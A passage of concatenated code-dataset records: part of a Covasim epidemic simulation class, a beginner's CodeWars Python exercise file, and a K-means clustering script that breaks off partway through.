self.load_data(datafile, datacols) # Load the data, if provided\n self.update_pars(pars) # Update the parameters, if provided\n if load_pop:\n self.load_population(popfile) # Load the population, if provided\n\n return\n\n\n def update_pars(self, pars=None, create=False, **kwargs):\n ''' Ensure that metaparameters get used properly before being updated '''\n pars = sc.mergedicts(pars, kwargs)\n if pars:\n if 'pop_type' in pars:\n cvpar.reset_layer_pars(pars)\n if 'prog_by_age' in pars:\n pars['prognoses'] = cvpar.get_prognoses(by_age=pars['prog_by_age']) # Reset prognoses\n super().update_pars(pars=pars, create=create) # Call update_pars() for ParsObj\n return\n\n\n def set_metadata(self, simfile, label):\n ''' Set the metadata for the simulation -- creation time and filename '''\n self.created = sc.now()\n self.version = cvv.__version__\n self.git_info = cvm.git_info()\n if simfile is None:\n datestr = sc.getdate(obj=self.created, dateformat='%Y-%b-%d_%H.%M.%S')\n self.simfile = f'covasim_{datestr}.sim'\n if label is not None:\n self.label = label\n return\n\n\n def load_data(self, datafile=None, datacols=None, **kwargs):\n ''' Load the data to calibrate against, if provided '''\n self.datafile = datafile # Store this\n if datafile is not None: # If a data file is provided, load it\n self.data = cvm.load_data(filename=datafile, columns=datacols, **kwargs)\n\n return\n\n\n def initialize(self, save_pop=False, load_pop=False, popfile=None, **kwargs):\n '''\n Perform all initializations.\n\n Args:\n save_pop (bool): if true, save the population to popfile\n load_pop (bool): if true, load the population from popfile\n popfile (str): filename to load/save the population\n kwargs (dict): passed to init_people\n '''\n self.t = 0 # The current time index\n self.validate_pars() # Ensure parameters have valid values\n self.set_seed() # Reset the random seed\n self.init_results() # Create the results stucture\n self.init_people(save_pop=save_pop, load_pop=load_pop, popfile=popfile, **kwargs) # Create all the people (slow)\n self.init_interventions()\n self.initialized = True\n return\n\n\n def reset_layer_pars(self, force=True):\n '''\n Reset the parameters to match the population.\n\n Args:\n force (bool): reset the pars even if they already exist\n '''\n if self.people is not None:\n layer_keys = self.people.contacts.keys()\n else:\n layer_keys = None\n cvpar.reset_layer_pars(self.pars, layer_keys=layer_keys, force=force)\n return\n\n\n def validate_pars(self):\n ''' Some parameters can take multiple types; this makes them consistent '''\n\n # Handle types\n for key in ['pop_size', 'pop_infected', 'pop_size']:\n try:\n self[key] = int(self[key])\n except Exception as E:\n errormsg = f'Could not convert {key}={self[key]} of {type(self[key])} to integer'\n raise ValueError(errormsg) from E\n\n # Handle start day\n start_day = self['start_day'] # Shorten\n if start_day in [None, 0]: # Use default start day\n start_day = '2020-03-01'\n self['start_day'] = cvm.date(start_day)\n\n # Handle end day and n_days\n end_day = self['end_day']\n n_days = self['n_days']\n if end_day:\n self['end_day'] = cvm.date(end_day)\n n_days = cvm.daydiff(self['start_day'], self['end_day'])\n if n_days <= 0:\n errormsg = f\"Number of days must be >0, but you supplied start={str(self['start_day'])} and end={str(self['end_day'])}, which gives n_days={n_days}\"\n raise ValueError(errormsg)\n else:\n self['n_days'] = int(n_days)\n else:\n if n_days:\n self['n_days'] = int(n_days)\n self['end_day'] = self.date(n_days) # Convert from the number of days to the end day\n else:\n errormsg = f'You must supply one of n_days and end_day, not \"{n_days}\" and \"{end_day}\"'\n raise ValueError(errormsg)\n\n # Handle parameters specified by layer\n\n\n # Try to figure out what the layer keys should be\n layer_keys = None # e.g. household, school\n layer_pars = ['beta_layer', 'contacts', 'iso_factor', 'quar_factor']\n if self.people is not None:\n layer_keys = set(self.people.contacts.keys())\n elif isinstance(self['beta_layer'], dict):\n layer_keys = list(self['beta_layer'].keys()) # Get keys from beta_layer since the \"most required\" layer parameter\n else:\n layer_keys = ['a'] # Assume this by default, corresponding to random/no layers\n\n # Convert scalar layer parameters to dictionaries\n for lp in layer_pars:\n val = self[lp]\n if sc.isnumber(val): # It's a scalar instead of a dict, assume it's all contacts\n self[lp] = {k:val for k in layer_keys}\n\n # Handle key mismaches\n for lp in layer_pars:\n lp_keys = set(self.pars[lp].keys())\n if not lp_keys == set(layer_keys):\n errormsg = f'Layer parameters have inconsistent keys:'\n for lp2 in layer_pars: # Fail on first error, but re-loop to list all of them\n errormsg += f'\\n{lp2} = ' + ', '.join(self.pars[lp].keys())\n raise sc.KeyNotFoundError(errormsg)\n\n if self.people is not None:\n pop_keys = set(self.people.contacts.keys())\n if pop_keys != layer_keys:\n errormsg = f'Please update your parameter keys {layer_keys} to match population keys {pop_keys}. You may find sim.reset_layer_pars() helpful.'\n raise sc.KeyNotFoundError(errormsg)\n\n # Handle population data\n popdata_choices = ['random', 'hybrid', 'clustered', 'synthpops']\n choice = self['pop_type']\n if choice not in popdata_choices:\n choicestr = ', '.join(popdata_choices)\n errormsg = f'Population type \"{choice}\" not available; choices are: {choicestr}'\n raise ValueError(errormsg)\n\n # Handle interventions\n self['interventions'] = sc.promotetolist(self['interventions'], keepnone=False)\n for i,interv in enumerate(self['interventions']):\n if isinstance(interv, dict): # It's a dictionary representation of an intervention\n self['interventions'][i] = cvi.InterventionDict(**interv)\n\n return\n\n\n def init_results(self):\n '''\n Create the main results structure.\n We differentiate between flows, stocks, and cumulative results\n The prefix \"new\" is used for flow variables, i.e. counting new events (infections/deaths/recoveries) on each timestep\n The prefix \"n\" is used for stock variables, i.e. counting the total number in any given state (sus/inf/rec/etc) on any particular timestep\n The prefix \"cum\" is used for cumulative variables, i.e. counting the total number that have ever been in a given state at some point in the sim\n Note that, by definition, n_dead is the same as cum_deaths and n_recovered is the same as cum_recoveries, so we only define the cumulative versions\n '''\n\n def init_res(*args, **kwargs):\n ''' Initialize a single result object '''\n output = cvb.Result(*args, **kwargs, npts=self.npts)\n return output\n\n dcols = cvd.get_colors() # Get default colors\n\n # Flows and cumulative flows\n for key,label in cvd.result_flows.items():\n self.results[f'cum_{key}'] = init_res(f'Cumulative {label}', color=dcols[key]) # Cumulative variables -- e.g. \"Cumulative infections\"\n\n for key,label in cvd.result_flows.items(): # Repeat to keep all the cumulative keys together\n self.results[f'new_{key}'] = init_res(f'Number of new {label}', color=dcols[key]) # Flow variables -- e.g. \"Number of new infections\"\n\n # Stock variables\n for key,label in cvd.result_stocks.items():\n self.results[f'n_{key}'] = init_res(label, color=dcols[key])\n self.results['n_susceptible'].scale = 'static'\n self.results['bed_capacity'] = init_res('Bed demand relative to capacity', scale=False)\n\n # Other variables\n self.results['r_eff'] = init_res('Effective reproductive number', scale=False)\n self.results['doubling_time'] = init_res('Doubling time', scale=False)\n\n # Populate the rest of the results\n if self['rescale']:\n scale = 1\n else:\n scale = self['pop_scale']\n self.rescale_vec = scale*np.ones(self.npts)\n self.results['t'] = self.tvec\n self.results['date'] = self.datevec\n self.results_ready = False\n\n return\n\n\n def load_population(self, popfile=None, **kwargs):\n '''\n Load the population dictionary from file -- typically done automatically\n as part of sim.initialize(load_pop=True).\n\n Args:\n popfile (str): name of the file to load\n '''\n if popfile is None and self.popfile is not None:\n popfile = self.popfile\n if popfile is not None:\n filepath = sc.makefilepath(filename=popfile, **kwargs)\n self.popdict = sc.loadobj(filepath)\n n_actual = len(self.popdict['uid'])\n n_expected = self['pop_size']\n if n_actual != n_expected:\n errormsg = f'Wrong number of people ({n_expected:n} requested, {n_actual:n} actual) -- please change \"pop_size\" to match or regenerate the file'\n raise ValueError(errormsg)\n if self['verbose']:\n print(f'Loaded population from {filepath}')\n return\n\n\n def init_people(self, save_pop=False, load_pop=False, popfile=None, verbose=None, **kwargs):\n '''\n Create the people.\n\n Args:\n save_pop (bool): if true, save the population to popfile\n load_pop (bool): if true, load the population from popfile\n popfile (str): filename to load/save the population\n verbose (int): detail to prnt\n '''\n\n # Handle inputs\n if verbose is None:\n verbose = self['verbose']\n if verbose:\n print(f'Initializing sim with {self[\"pop_size\"]:0n} people for {self[\"n_days\"]} days')\n if load_pop and self.popdict is None:\n self.load_population(popfile=popfile)\n\n # Actually make the people\n cvpop.make_people(self, save_pop=save_pop, popfile=popfile, verbose=verbose, **kwargs)\n self.people.initialize()\n\n # Create the seed infections\n inds = cvu.choose(self['pop_size'], self['pop_infected'])\n self.people.infect(inds=inds)\n for ind in inds:\n self.people.transtree.linelist[ind] = dict(source=None, target=ind, date=self.t, layer='seed_infection')\n\n return\n\n\n def init_interventions(self):\n ''' Initialize the interventions '''\n # Initialize interventions\n for intervention in self['interventions']:\n if not intervention.initialized:\n intervention.initialize(self)\n return\n\n\n def rescale(self):\n ''' Dynamically rescale the population '''\n if self['rescale']:\n t = self.t\n pop_scale = self['pop_scale']\n current_scale = self.rescale_vec[t]\n if current_scale < pop_scale: # We have room to rescale\n n_not_sus = self.people.count_not('susceptible')\n n_people = len(self.people)\n if n_not_sus / n_people > self['rescale_threshold']: # Check if we've reached point when we want to rescale\n max_ratio = pop_scale/current_scale # We don't want to exceed this\n scaling_ratio = min(self['rescale_factor'], max_ratio)\n self.rescale_vec[t:] *= scaling_ratio # Update the rescaling factor from here on\n n = int(n_people*(1.0-1.0/scaling_ratio)) # For example, rescaling by 2 gives n = 0.5*n_people\n new_sus_inds = cvu.choose(max_n=n_people, n=n) # Choose who to make susceptible again\n self.people.make_susceptible(new_sus_inds)\n # print(f\"Rescaled by {scaling_ratio} on {self.datevec[self.t]} because {n_not_sus/n_people}\")#, 2, self['verbose'])\n return\n\n\n def step(self):\n '''\n Step the simulation forward in time\n '''\n\n # Set the time and if we have reached the end of the simulation, then do nothing\n t = self.t\n if t >= self.npts:\n return\n\n # Perform initial operations\n self.rescale() # Check if we need to rescale\n people = self.people # Shorten this for later use\n flows = people.update_states_pre(t=t) # Update the state of everyone and count the flows\n contacts = people.update_contacts() # Compute new contacts\n bed_max = people.count('severe') > self['n_beds'] if self['n_beds'] else False # Check for a bed constraint\n\n # Randomly infect some people (imported infections)\n n_imports = cvu.poisson(self['n_imports']) # Imported cases\n if n_imports>0:\n imporation_inds = cvu.choose(max_n=len(people), n=n_imports)\n flows['new_infections'] += people.infect(inds=imporation_inds, bed_max=bed_max)\n for ind in imporation_inds:\n self.people.transtree.linelist[ind] = dict(source=None, target=ind, date=self.t, layer='importation')\n\n # Apply interventions\n for intervention in self['interventions']:\n intervention.apply(self)\n if self['interv_func'] is not None: # Apply custom intervention function\n self['interv_func'](self)\n\n flows = people.update_states_post(flows) # Check for state changes after interventions\n\n # Compute the probability of transmission\n beta = cvd.default_float(self['beta'])\n asymp_factor = cvd.default_float(self['asymp_factor'])\n frac_time = cvd.default_float(self['viral_dist']['frac_time'])\n load_ratio = cvd.default_float(self['viral_dist']['load_ratio'])\n high_cap = cvd.default_float(self['viral_dist']['high_cap'])\n date_inf = people.date_infectious\n date_rec = people.date_recovered\n date_dead = people.date_dead\n viral_load = cvu.compute_viral_load(t, date_inf, date_rec, date_dead, frac_time, load_ratio, high_cap)\n\n for lkey,layer in contacts.items():\n p1 = layer['p1']\n p2 = layer['p2']\n betas = layer['beta']\n\n # Compute relative transmission and susceptibility\n rel_trans = people.rel_trans\n rel_sus = people.rel_sus\n inf = people.infectious\n sus = people.susceptible\n symp = people.symptomatic\n diag = people.diagnosed\n quar = people.quarantined\n iso_factor = cvd.default_float(self['iso_factor'][lkey])\n quar_factor = cvd.default_float(self['quar_factor'][lkey])\n beta_layer = cvd.default_float(self['beta_layer'][lkey])\n rel_trans, rel_sus = cvu.compute_trans_sus(rel_trans, rel_sus, inf, sus, beta_layer, viral_load, symp, diag, quar, asymp_factor, iso_factor, quar_factor)\n\n # Calculate actual transmission\n for sources,targets in [[p1,p2], [p2,p1]]: # Loop over the contact network from p1->p2 and p2->p1\n target_inds, edge_inds = cvu.compute_infections(beta, sources, targets, betas, rel_trans, rel_sus) # Calculate transmission!\n flows['new_infections'] += people.infect(inds=target_inds, bed_max=bed_max) # Actually infect people\n\n # Store the transmission tree\n for ind in edge_inds:\n source = sources[ind]\n target = targets[ind]\n transdict = dict(source=source, target=target, date=self.t, layer=lkey)\n self.people.transtree.linelist[target] = transdict\n self.people.transtree.targets[source].append(transdict)\n\n # Update counts for this time step: stocks\n for key in cvd.result_stocks.keys():\n self.results[f'n_{key}'][t] = people.count(key)\n self.results['bed_capacity'][t] = self.results['n_severe'][t]/self['n_beds'] if self['n_beds'] else 0\n\n # Update counts for this time step: flows\n for key,count in flows.items():\n self.results[key][t] += count\n\n # Tidy up\n self.t += 1\n return\n\n\n def run(self, do_plot=False, until=None, verbose=None, **kwargs):\n '''\n Run the simulation.\n\n Args:\n do_plot (bool): whether to plot\n until (int): day to run until\n verbose (int): level of detail to print\n kwargs (dict): passed to self.plot()\n\n Returns:\n results: the results object (also modifies in-place)\n '''\n\n # Initialize\n T = sc.tic()\n if not self.initialized:\n self.initialize()\n else:\n self.validate_pars() # We always want to validate the parameters before running\n self.init_interventions() # And interventions\n if verbose is None:\n verbose = self['verbose']\n if until:\n until = self.day(until)\n\n # Main simulation loop\n for t in self.tvec:\n\n # Print progress\n if verbose >= 1:\n elapsed = sc.toc(output=True)\n simlabel = f'\"{self.label}\": ' if self.label else ''\n string = f' Running {simlabel}{self.datevec[t]} ({t:2.0f}/{self.pars[\"n_days\"]}) ({elapsed:0.2f} s) '\n if verbose >= 2:\n sc.heading(string)\n elif verbose == 1:\n sc.progressbar(t+1, self.npts, label=string, length=20, newline=True)\n\n # Do the heavy lifting -- actually run the model!\n self.step()\n\n # Check if we were asked to stop\n elapsed = sc.toc(T, output=True)\n if self['timelimit'] and elapsed > self['timelimit']:\n sc.printv(f\"Time limit ({self['timelimit']} s) exceeded\", 1, verbose)\n break\n elif self['stopping_func'] and self['stopping_func'](self):\n sc.printv(\"Stopping function terminated the simulation\", 1, verbose)\n break\n if self.t == until: # If until is specified, just stop here\n return\n\n # End of time loop; compute cumulative results outside of the time loop\n self.finalize(verbose=verbose) # Finalize the results\n sc.printv(f'Run finished after {elapsed:0.2f} s.\\n', 1, verbose)\n if do_plot: # Optionally plot\n self.plot(**kwargs)\n\n return self.results\n\n\n def finalize(self, verbose=None):\n ''' Compute final results, likelihood, etc. '''\n\n # Scale the results\n for reskey in self.result_keys():\n if self.results[reskey].scale == 'dynamic':\n self.results[reskey].values *= self.rescale_vec\n elif self.results[reskey].scale == 'static':\n self.results[reskey].values *= self['pop_scale']\n\n # Calculate cumulative results\n for key in cvd.result_flows.keys():\n self.results[f'cum_{key}'].values[:] = np.cumsum(self.results[f'new_{key}'].values)\n self.results['cum_infections'].values += self['pop_infected']*self.rescale_vec[0] # Include initially infected people\n\n # Perform calculations on results\n self.compute_results()\n\n # Convert results to a odicts/objdict to allow e.g. sim.results.diagnoses\n self.results = sc.objdict(self.results)\n self.results_ready = True\n self.initialized = False # To enable re-running\n\n return\n\n def compute_results(self, verbose=None):\n ''' Perform final calculations on the results '''\n self.compute_doubling()\n self.compute_r_eff()\n self.compute_likelihood()\n self.compute_summary(verbose=verbose)\n return\n\n\n def compute_doubling(self, window=3, max_doubling_time=30):\n '''\n Calculate doubling time using exponential approximation -- a more detailed\n approach is in utils.py. Compares infections at time t to infections at time\n t-window, and uses that to compute the doubling time. For example, if there are\n 100 cumulative infections on day 12 and 200 infections on day 19, doubling\n time is 7 days.\n\n Args:\n window (float): the size of the window used (larger values are more accurate but less precise)\n max_doubling_time (float): doubling time could be infinite, so this places a bound on it\n\n Returns:\n doubling_time (array): the doubling time results array\n '''\n cum_infections = self.results['cum_infections'].values\n self.results['doubling_time'][:window] = np.nan\n for t in range(window, self.npts):\n infections_now = cum_infections[t]\n infections_prev = cum_infections[t-window]\n r = infections_now/infections_prev\n if r > 1: # Avoid divide by zero\n doubling_time = window*np.log(2)/np.log(r)\n doubling_time = min(doubling_time, max_doubling_time) # Otherwise, it's unbounded\n self.results['doubling_time'][t] = doubling_time\n return self.results['doubling_time'].values\n\n\n def compute_r_eff(self, method='daily', smoothing=2, window=7):\n '''\n Effective reproductive number based on number of people each person infected.\n\n Args:\n method (str): 'instant' uses daily infections, 'infectious' counts from the date infectious, 'outcome' counts from the date recovered/dead\n smoothing (int): the number of steps to smooth over for the 'daily' method\n window (int): the size of the window used for 'infectious' and 'outcome' calculations (larger values are more accurate but less precise)\n\n Returns:\n r_eff (array): the r_eff results array\n '''\n\n # Initialize arrays to hold sources and targets infected each day\n sources = np.zeros(self.npts)\n targets = np.zeros(self.npts)\n window = int(window)\n\n # Default method -- calculate the daily infections\n if method == 'daily':\n\n # Find the dates that everyone became infectious and recovered, and hence calculate infectious duration\n recov_inds = self.people.defined('date_recovered')\n dead_inds = self.people.defined('date_dead')\n date_recov = self.people.date_recovered[recov_inds]\n date_dead = self.people.date_dead[dead_inds]\n date_outcome = np.concatenate((date_recov, date_dead))\n inds = np.concatenate((recov_inds, dead_inds))\n date_inf = self.people.date_infectious[inds]\n mean_inf = date_outcome.mean() - date_inf.mean()\n\n # Calculate R_eff as the mean infectious duration times the number of new infectious divided by the number of infectious people on a given day\n values = mean_inf*self.results['new_infections'].values/(self.results['n_infectious'].values+1e-6)\n if len(values) >= 3: # Can't smooth arrays shorter than this\n values = sc.smooth(values, smoothing)\n\n # Alternate (traditional) method -- count from the date of infection or outcome\n elif method in ['infectious', 'outcome']:\n\n for t in self.tvec:\n\n # Sources are easy -- count up the arrays\n if method == 'infectious':\n inds = cvu.true(t == self.people.date_infectious) # Find people who became infectious on this timestep\n elif method == 'outcome':\n recov_inds = cvu.true(t == self.people.date_recovered) # Find people who recovered on this timestep\n dead_inds = cvu.true(t == self.people.date_dead) # Find people who died on this timestep\n inds = np.concatenate((recov_inds, dead_inds))\n sources[t] = len(inds)\n\n # Targets are hard -- loop over the transmission tree\n for ind in inds:\n targets[t] += len(self.people.transtree.targets[ind])\n\n # Populate the array -- to avoid divide-by-zero, skip indices that are 0\n inds = sc.findinds(sources>0)\n r_eff = np.zeros(self.npts)*np.nan\n r_eff[inds] = targets[inds]/sources[inds]\n\n # Use stored weights calculate the moving average over the window of timesteps, n\n num = np.nancumsum(r_eff * sources)\n num[window:] = num[window:] - num[:-window]\n den = np.cumsum(sources)\n den[window:] = den[window:] - den[:-window]\n\n # Avoid dividing by zero\n values = np.zeros(num.shape)*np.nan\n ind = den > 0\n values[ind] = num[ind]/den[ind]\n\n # Method not recognized\n else:\n errormsg = f'Method must be \"daily\", \"infected\", or \"outcome\", not \"{method}\"'\n raise ValueError(errormsg)\n\n # Set the values and return\n self.results['r_eff'].values[:] = values\n\n return self.results['r_eff'].values\n\n\n def compute_gen_time(self):\n '''\n Calculate the generation time (or serial interval). There are two\n ways to do this calculation. The 'true' interval (exposure time to\n exposure time) or 'clinical' (symptom onset to symptom onset).\n\n Returns:\n gen_time (dict): the generation time results\n '''\n\n intervals1 = np.zeros(len(self.people))\n intervals2 = np.zeros(len(self.people))\n pos1 = 0\n pos2 = 0\n targets = self.people.transtree.targets\n date_exposed = self.people.date_exposed\n date_symptomatic = self.people.date_symptomatic\n for p in range(len(self.people)):\n if len(targets[p])>0:\n for target in targets[p]:\n target_ind = target['target']\n intervals1[pos1] = date_exposed[target_ind] - date_exposed[p]\n pos1 += 1\n if not np.isnan(date_symptomatic[p]):\n if not np.isnan(date_symptomatic[target_ind]):\n intervals2[pos2] = date_symptomatic[target_ind] - date_symptomatic[p]\n pos2 += 1\n\n self.results['gen_time'] = {\n 'true': np.mean(intervals1[:pos1]),\n 'true_std': np.std(intervals1[:pos1]),\n 'clinical': np.mean(intervals2[:pos2]),\n 'clinical_std': np.std(intervals2[:pos2])}\n return self.results['gen_time']\n\n\n def compute_likelihood(self, weights=None, verbose=None, eps=1e-16):\n '''\n Compute the log-likelihood of the current simulation based on the number\n of new diagnoses.\n\n Args:\n weights (dict): the relative wieght to place on each result\n verbose (bool): detail to print\n eps (float): to avoid divide-by-zero errors\n\n Returns:\n loglike (float): the log-likelihood of the model given the data\n '''\n\n if verbose is None:\n verbose = self['verbose']\n\n if weights is None:\n weights = {}\n\n if self.data is None:\n return np.nan\n\n loglike = 0\n\n model_dates = self.datevec.tolist()\n\n for key in set(self.result_keys()).intersection(self.data.columns): # For keys present in both the results and in the data\n weight = weights.get(key, 1) # Use the provided weight if present, otherwise default to 1\n for d, datum in self.data[key].iteritems():\n if np.isfinite(datum):\n if d in model_dates:\n estimate = self.results[key][model_dates.index(d)]\n if np.isfinite(datum) and np.isfinite(estimate):\n if (datum == 0) and (estimate == 0):\n p = 1.0\n else:\n p = cvm.poisson_test(datum, estimate)\n p = max(p, eps)\n logp = pl.log(p)\n loglike += weight*logp\n sc.printv(f' {d}, data={datum:3.0f}, model={estimate:3.0f}, log(p)={logp:10.4f}, loglike={loglike:10.4f}', 2, verbose)\n\n self.results['likelihood'] = loglike\n\n sc.printv(f'Likelihood: {loglike}', 1, verbose)\n return loglike\n\n\n def compute_summary(self, verbose=None):\n ''' Compute the summary statistics to display at the end of a run '''\n\n if verbose is None:\n verbose = self['verbose']\n\n summary = sc.objdict()\n summary_str = 'Summary:\\n'\n for key in self.result_keys():\n summary[key] = self.results[key][-1]\n if key.startswith('cum_'):\n summary_str += f' {summary[key]:5.0f} {self.results[key].name.lower()}\\n'\n sc.printv(summary_str, 1, verbose)\n self.summary = summary\n\n return summary\n\n\n def plot(self, *args, **kwargs):\n '''\n Plot the results of a single simulation.\n\n Args:\n to_plot (dict): Dict of results to plot; see get_sim_plots() for structure\n do_save (bool): Whether or not to save the figure\n fig_path (str): Path to save the figure\n fig_args (dict): Dictionary of kwargs to be passed to pl.figure()\n plot_args (dict): Dictionary of kwargs to be passed to pl.plot()\n scatter_args (dict): Dictionary of kwargs to be passed to pl.scatter()\n axis_args (dict): Dictionary of kwargs to be passed to pl.subplots_adjust()\n legend_args (dict): Dictionary of kwargs to be passed to pl.legend()\n as_dates (bool): Whether to plot the x-axis as dates or time points\n dateformat (str): Date string format, e.g. '%B %d'\n interval (int): Interval between tick marks\n n_cols (int): Number of columns of subpanels to use for subplot\n font_size (int): Size of the font\n font_family (str): Font face\n grid (bool): Whether or not to plot gridlines\n commaticks (bool): Plot y-axis with commas rather than scientific notation\n setylim (bool): Reset the y limit to start at 0\n log_scale (bool): Whether or not to plot the y-axis with a log scale; if a list, panels to show as log\n do_show (bool): Whether or not to show the figure\n colors (dict): Custom color for each result, must be a dictionary with one entry per result key in to_plot\n sep_figs (bool): Whether to show separate figures for different results instead of subplots\n fig (fig): Handle of existing figure to plot into\n\n Returns:\n fig: Figure handle\n\n\n **Example**::\n\n sim = cv.Sim()\n sim.run()\n sim.plot()\n '''\n fig = cvplt.plot_sim(sim=self, *args, **kwargs)\n return fig\n\n\n def plot_result(self, key, *args, **kwargs):\n '''\n Simple method to plot a single result. Useful for results that aren't\n standard outputs. See sim.plot() for explanation of other arguments.\n\n Args:\n key (str): the key of the result to plot\n\n **Examples**::\n\n sim.plot_result('r_eff')\n '''\n fig = cvplt.plot_result(sim=self, key=key, *args, **kwargs)\n return fig","repo_name":"bosetinsky/eswatini-covasim","sub_path":"covasim/sim.py","file_name":"sim.py","file_ext":"py","file_size_in_byte":35094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"16317173471","text":"#1.Write a method, that will get an integer array as parameter and will process every number from this array.\r\n#Return a new array with processing every number of the input-array like this:\r\n#If the number has an integer square root, take this, otherwise square the number.\r\n\r\n\r\nimport math\r\ndef square_or_square_root(arr):\r\n for item in range(len(arr)):\r\n if math.sqrt(arr[item]) % 1 == 0:\r\n arr[item] = int(math.sqrt(arr[item]))\r\n else:\r\n arr[item] = arr[item] * arr[item]\r\n\r\n print(arr)\r\n\r\n#square_or_square_root([3,4,9,2])\r\n\r\nprint(math.sqrt(3))\r\n\r\n#2.Complete the square sum function so that it squares each number passed into it and then sums the results together.\r\n\r\ndef square_sum(numbers):\r\n suma = 0\r\n for item in range(len(numbers)):\r\n suma = suma + numbers[item] * numbers[item]\r\n\r\n print(suma)\r\n\r\n#square_sum([1,2,2])\r\n\r\n#3.Create a function that returns the CSV representation of a two-dimensional numeric array.\r\nfrom array import *\r\ndef to_csv_text(array):\r\n new_string = \"\"\r\n for rows in range(len(array)):\r\n for cols in range(len(array[rows])):\r\n print(array[rows][cols] , end = ' ' )\r\n print(\"\\n\")\r\n\r\n\r\n\r\narray = [[ 0, 1, 2, 3, 4 ], [ 10,11,12,13,14 ], [ 20,21,22,23,24 ], [ 30,31,32,33,34 ]]\r\nprint (array[0])\r\n#to_csv_text(array)\r\n\r\n\r\n#4.Write a function that returns a string in which firstname is swapped with last name.\r\n#def name_shuffler(str_):\r\nnume = \"ala bala\"\r\nnume1 = nume.split(\" \")\r\n\r\nfor i in range(int(len(nume1)-1)):\r\n a = nume1[i]\r\n nume1[i] = str(nume1[i+1])\r\n b = str(a)\r\n new_string = nume1[i] + \" \" + b\r\n\r\nprint (new_string)\r\n\r\n\r\n#5.We want to know the index of the vowels in a given word, for example, there are two vowels\r\n# in the word super (the second and fourth letters).\r\n\r\n#So given a string \"super\", we should return a list of [2, 4].\r\ndef vowel_indices(word):\r\n lista=[]\r\n word.lower()\r\n for i in range(len(word)):\r\n if word[i] in \"aeiou\":\r\n lista.append(i+1)\r\n print(lista)\r\nvowel_indices(\"UNDISARMED\")\r\nword = \"UNDISARMED\"\r\n#print(word.lower())\r\n\r\n\r\n\r\n#6.Take an array and remove every second element from the array. Always keep the first element and start removing with the next element.\r\ndef remove_every_other(my_list):\r\n new_list=[]\r\n for i in range(len(my_list)):\r\n if i % 2 == 0:\r\n new_list.append(my_list[i])\r\n\r\n print(new_list)\r\n\r\n#remove_every_other([\"Keep\", \"Remove\",\"Keep\", \"Remove\",\"Keep\", \"Remove\",\"Keep\", \"Remove\"])\r\n\r\n#7.Simple, remove the spaces from the string, then return the resultant string\r\ndef no_space(x):\r\n new_str = \"\"\r\n for c in range(len(x)) :\r\n if x[c] != \" \":\r\n new_str = new_str + x[c]\r\n\r\n print(new_str)\r\nno_space(\"aa b b\")\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Mizil/CodeWars","sub_path":"CodeWars.py","file_name":"CodeWars.py","file_ext":"py","file_size_in_byte":2804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31589193856","text":"from DataPoints import DataPoints\r\nfrom Plotter import Plotter\r\nimport random\r\nimport sys\r\nimport math\r\n\r\n\r\ndef sqrt(n):\r\n return math.sqrt(n)\r\n\r\n\r\nclass Centroid:\r\n def __init__(self, x, y):\r\n self.x = x\r\n self.y = y\r\n\r\n def __eq__(self, other):\r\n if not type(other) is type(self):\r\n return False\r\n if other is self:\r\n return True\r\n if other is None:\r\n return False\r\n if self.x != other.x:\r\n return False\r\n if self.y != other.y:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n result = self.__eq__(other)\r\n if result is NotImplemented:\r\n return result\r\n return not result\r\n\r\n def toString(self):\r\n return \"Centroid [x=\" + self.x + \", y=\" + self.y + \"]\"\r\n\r\n def __str__(self):\r\n return self.toString()\r\n\r\n def __repr__(self):\r\n return self.toString()\r\n\r\n\r\nclass KMeans:\r\n def __init__(self):\r\n self.K = 0 # num of labels / clusters\r\n\r\n def main(self, args):\r\n seed = 71\r\n\r\n dataSet = self.readDataSet(\"dataset1.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n print(\"\")\r\n dataSet = self.readDataSet(\"dataset2.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n print(\"\")\r\n dataSet = self.readDataSet(\"dataset3.txt\")\r\n self.K = DataPoints.getNoOFLabels(dataSet)\r\n random.Random(seed).shuffle(dataSet)\r\n self.kmeans(dataSet)\r\n\r\n def kmeans(self, dataSet):\r\n clusters = []\r\n k = 0\r\n while k < self.K:\r\n cluster = set()\r\n clusters.append(cluster)\r\n k += 1\r\n\r\n # Initially randomly assign points to clusters\r\n i = 0\r\n for point in dataSet:\r\n clusters[i % k].add(point)\r\n i += 1\r\n\r\n # calculate centroid for clusters\r\n centroids = []\r\n for j in range(self.K):\r\n centroids.append(self.getCentroid(clusters[j]))\r\n\r\n self.reassignClusters(dataSet, centroids, clusters)\r\n\r\n # continue till converge\r\n iteration = 0\r\n while True:\r\n iteration += 1\r\n\r\n # calculate centroid for clusters\r\n centroidsNew = []\r\n for j in range(self.K):\r\n centroidsNew.append(self.getCentroid(clusters[j]))\r\n\r\n # check onvergence\r\n isConverge = True\r\n for j in range(self.K):\r\n if centroidsNew[j] != centroids[j]:\r\n isConverge = False\r\n if isConverge:\r\n break\r\n\r\n self.reassignClusters(dataSet, centroidsNew, clusters)\r\n for j in range(self.K):\r\n centroids[j] = centroidsNew[j]\r\n\r\n print(\"Iteration :\" + str(iteration))\r\n # Calculate purity\r\n maxLabelCluster = []\r\n for j in range(self.K):\r\n maxLabelCluster.append(self.getMaxClusterLabel(clusters[j]))\r\n purity = 0.0\r\n for j in range(self.K):\r\n purity += maxLabelCluster[j]\r\n purity /= len(dataSet)\r\n print(\"Purity is :\" + str(purity))\r\n\r\n noOfLabels = DataPoints.getNoOFLabels(dataSet)\r\n nmiMatrix = DataPoints.getNMIMatrix(clusters, noOfLabels)\r\n nmi = DataPoints.calcNMI(nmiMatrix)\r\n print(\"NMI :\" + str(nmi))\r\n\r\n # plot the result\r\n Plotter.plot(clusters)\r\n\r\n def reassignClusters(self, dataSet, c, clusters):\r\n for j in range(self.K):\r\n clusters[j] = set()\r\n\r\n dist = [0.0 for x in range(self.K)]\r\n for point in dataSet:\r\n for i in range(self.K):\r\n dist[i] = self.getEuclideanDist(point.x, point.y, c[i].x, c[i].y)\r\n\r\n minIndex = self.getMinIndex(dist)\r\n clusters[minIndex].add(point)\r\n\r\n def getMinIndex(self, dist):\r\n min_ = sys.maxint\r\n minIndex = 